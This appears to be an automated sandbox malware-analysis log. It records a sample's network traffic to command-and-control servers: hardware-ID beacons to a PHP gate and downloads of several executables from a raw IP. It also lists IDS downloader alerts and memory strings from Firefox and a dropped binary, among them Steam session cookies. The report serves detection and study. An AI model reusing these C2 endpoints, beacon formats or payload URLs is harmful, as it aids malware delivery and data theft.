Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIIIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 46 43 47 49 4a 4b 4a 4b 46 48 49 44 48 49 49 49 2d 2d 0d 0a Data Ascii: ------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------HDAKFCGIJKJKFHIDHIIIContent-Disposition: form-data; name="build"doma------HDAKFCGIJKJKFHIDHIII--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000978001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="build"doma------HCBFIJJECFIEBGDGCFIJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000979001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="build"doma------IJJJEBFHDBGIECBFCBKJ--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 2d 2d 0d 0a Data Ascii: ------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="build"doma------CGCFCBAKKFBFIECAEBAE--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49967 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49713 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49990 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49992 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49996 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49996 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FEBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 8_2_00FEBE30
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3194453184.000001379DD95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-promptmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/about_compat_broker.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/spotify-embed.js equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-promptmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/about_compat_broker.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/spotify-embed.js equals www.twitter.com (Twitter)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :strippedURL AND :strippedURL || X'FFFF'UpdateService:_selectAndInstallUpdate - prompting because silent install is disabled. Notifying observers. topic: update-available, status: show-promptmoz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/lib/about_compat_broker.jsYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/moz-extension://bfdd6cf3-6cd6-4fa2-bc72-2c3d2e7d20f8/shims/spotify-embed.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://*.adsafeprotected.com/jsvid?*color-mix(in srgb, currentColor 9%, transparent)--autocomplete-popup-separator-color*://securepubads.g.doubleclick.net/gampad/*ad**://*.adsafeprotected.com/*/imp/*--panel-banner-item-update-supported-bgcolorhttps://en.wikipedia.org/wiki/Special:Search*resource://search-extensions/google/amazondotcom%40search.mozilla.org:1.6addons-search-detection@mozilla.com*://www.facebook.com/platform/impression.php*resource://search-extensions/wikipedia/toolkit.telemetry.send.overrideOfficialChecktoolkit.telemetry.untrustedModulesPing.frequency@mozilla.org/windows-registry-key;1firefox-compact-light@mozilla.orgfirefox-alpenglow%40mozilla.org:1.4TelemetrySession::onEnvironmentChangeresource://gre/modules/ctypes.sys.mjsdelayedInit/this._delayedInitTask<toolkit.telemetry.firstShutdownPing.enabledassemblePayloadWithMeasurements - reason: TELEMETRY_ASSEMBLE_PAYLOAD_EXCEPTIONtoolkit.telemetry.healthping.enabledresource://search-extensions/ddg/toolkit.telemetry.archive.enabledTELEMETRY_SESSIONDATA_FAILED_VALIDATIONtoolkit.telemetry.overrideUpdateChannelresource://gre/modules/AddonManager.sys.mjsresource://builtin-themes/alpenglow/_loadSessionData - session data is invalidresource://gre/modules/UpdateUtils.sys.mjsinternal-telemetry-after-subsession-splitresource://gre/modules/TelemetryUtils.sys.mjsfirefox-compact-light%40mozilla.org:1.2resource://search-extensions/bing/toolkit.telemetry.testing.disableFuzzingDelay equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://*.imgur.com/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/play.svg*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.js*://web-assets.toggl.com/app/assets/scripts/*.jsFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat_video.js*://pub.doubleverify.com/signals/pub.js**://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/all.js**://track.adform.net/serving/scripts/trackpoint/*://cdn.branch.io/branch-latest.min.js**://connect.facebook.net/*/sdk.js*https://smartblock.firefox.etp/facebook.svg*://c.amazon-adsystem.com/aax2/apstag.js*://www.google-analytics.com/analytics.js**://auth.9c9media.ca/auth/main.js*://static.criteo.net/js/ld/publishertag.js*://libs.coremetrics.com/eluminate.js*://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://s0.2mdn.net/instream/html5/ima3.jspictureinpicture%40mozilla.org:1.0.0*://ssl.google-analytics.com/ga.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js*FileUtils_closeAtomicFileOutputStreamwebcompat-reporter@mozilla.org.xpiwebcompat-reporter%40mozilla.org:1.5.1@mozilla.org/addons/addon-manager-startup;1*://www.everestjs.net/static/st.v3.js*resource://services-settings/IDBHelpers.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3210299308.000001379F117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3183838665.000001379A903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3204056198.000001379E616000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000019.00000002.3257901918.00000137A6715000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3258641939.00000137A69FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3257901918.00000137A67B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3210751265.000001379F221000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3213506140.000001379F6FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: 976d9f40c1.exe, 0000000B.00000002.2923405378.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 00000009.00000003.2803479877.000000000172B000.00000004.00000020.00020000.00000000.sdmp, 976d9f40c1.exe, 00000009.00000002.2806627641.000000000172B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ ht equals www.youtube.com (Youtube)
Source: 976d9f40c1.exe, 0000000B.00000002.2923205101.0000000000EB5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cb9e7f3651c38ac41ccf738a8ba3498dc; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=5ebdd52ca9f7afc37ef8283d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 23 Oct 2024 13:49:29 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 00000019.00000002.3183838665.000001379A973000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WebChannel/this._originCheckCallbackDevToolsStartup.jsm:handleDebuggerFlagdevtools-commandkey-profiler-capture@mozilla.org/network/protocol;1?name=defaultFailed to listen. Listener already attached.Failed to execute WebChannel callback:browser and that URL. Falling back to devtools/client/framework/devtools-browserdevtools-commandkey-javascript-tracing-toggledevtools.debugger.features.javascript-tracing^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urlreleaseDistinctSystemPrincipalLoaderdevtools.performance.popup.feature-flagresource://devtools/server/devtools-server.jsdevtools/client/framework/devtoolsDevTools telemetry entry point failed: @mozilla.org/dom/slow-script-debug;1devtools.debugger.remote-websocket{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataFailed to listen. Callback argument missing.@mozilla.org/network/protocol;1?name=fileUnable to start devtools server on JSON Viewer's onSave failed in startPersistenceNo callback set for this channel.@mozilla.org/uriloader/handler-service;1and deploy previews URLs are allowed.resource://devtools/shared/security/socket.jsbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNameshttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/dbus-handler-app;1https://mail.yahoo.co.jp/compose/?To=%s@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/DeferredTask.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}Scheme should be either http or httpsresource://gre/modules/FileUtils.sys.mjs{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/NetUtil.sys.mjsisDownloadsImprovementsAlreadyMigratedhttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPhttps://poczta.interia.pl/mh/?mailto=%s^([a-z+.-]+:\/{0,3})*([^\/@]+@).+http://www.inbox.lv/rfc2368/?value=%sget FIXUP_FLAG_FORCE_ALTERNATE_URICan't invoke URIFixup in the content processextractScheme/fixupChangedProtocol<resource://gre/modules/JSONFile.sys.mjsgecko.handlerService.defaultHandlersVersionbrowser.fixup.domainsuffixwhitelist.http://win.mail.ru/cgi-bin/sentmsg?mailto=%s_injectDefaultProtocolHandlersIfNeeded@mozilla.org/uriloader/local-handler-app;1^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get FIXUP_FLAGS_MAKE_ALTERNATE_URIhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.inbox.lv/compose?to=%s@mozilla.org/network/file-input-stream;1resource://gre/modules/JSONFile.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callback@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/c
